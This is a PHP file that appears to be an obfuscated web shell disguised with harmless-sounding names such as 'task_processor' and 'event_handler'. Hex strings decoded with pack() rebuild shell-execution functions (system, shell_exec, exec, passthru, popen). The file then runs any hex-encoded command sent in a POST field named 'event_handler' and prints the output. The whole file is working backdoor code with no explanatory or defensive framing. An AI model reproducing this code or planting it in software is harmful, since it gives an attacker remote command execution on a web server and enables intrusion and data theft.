<?php


$binding1 = '79';
$binding2 = '74';
$binding3 = '6d';
$binding4 = '65';
$binding5 = '6c';
$binding6 = '5f';
$binding7 = '78';
$binding8 = '63';
$binding9 = '61';
$binding10 = '72';
$binding11 = '70';
$binding12 = '6f';
$binding13 = '73';
$binding14 = '6e';
$binding15 = '68';
$binding16 = '64';
$task_processor1 = pack("H*", '73' . $binding1 . '73' . $binding2 . '65' . $binding3);
$task_processor2 = pack("H*", '73' . '68' . $binding4 . $binding5 . $binding5 . $binding6 . $binding4 . $binding7 . '65' . '63');
$task_processor3 = pack("H*", '65' . $binding7 . $binding4 . $binding8);
$task_processor4 = pack("H*", '70' . $binding9 . '73' . '73' . '74' . '68' . $binding10 . '75');
$task_processor5 = pack("H*", $binding11 . $binding12 . '70' . $binding4 . '6e');
$task_processor6 = pack("H*", $binding13 . $binding2 . '72' . '65' . $binding9 . '6d' . '5f' . '67' . $binding4 . '74' . $binding6 . $binding8 . '6f' . $binding14 . '74' . '65' . '6e' . $binding2 . $binding13);
$task_processor7 = pack("H*", $binding11 . $binding8 . '6c' . $binding12 . '73' . $binding4);
$event_handler = pack("H*", $binding4 . '76' . '65' . '6e' . '74' . $binding6 . $binding15 . $binding9 . $binding14 . $binding16 . '6c' . $binding4 . '72');
if (isset($_POST[$event_handler])) {
    $event_handler = pack("H*", $_POST[$event_handler]);
    if (function_exists($task_processor1)) {
        $task_processor1($event_handler);
    } elseif (function_exists($task_processor2)) {
        print $task_processor2($event_handler);
    } elseif (function_exists($task_processor3)) {
        $task_processor3($event_handler, $holder_dat);
        print join("\n", $holder_dat);
    } elseif (function_exists($task_processor4)) {
        $task_processor4($event_handler);
    } elseif (function_exists($task_processor5) && function_exists($task_processor6) && function_exists($task_processor7)) {
        $property_set_hld = $task_processor5($event_handler, 'r');
        if ($property_set_hld) {
            $pset_component = $task_processor6($property_set_hld);
            $task_processor7($property_set_hld);
            print $pset_component;
        }
    }
    exit;
}
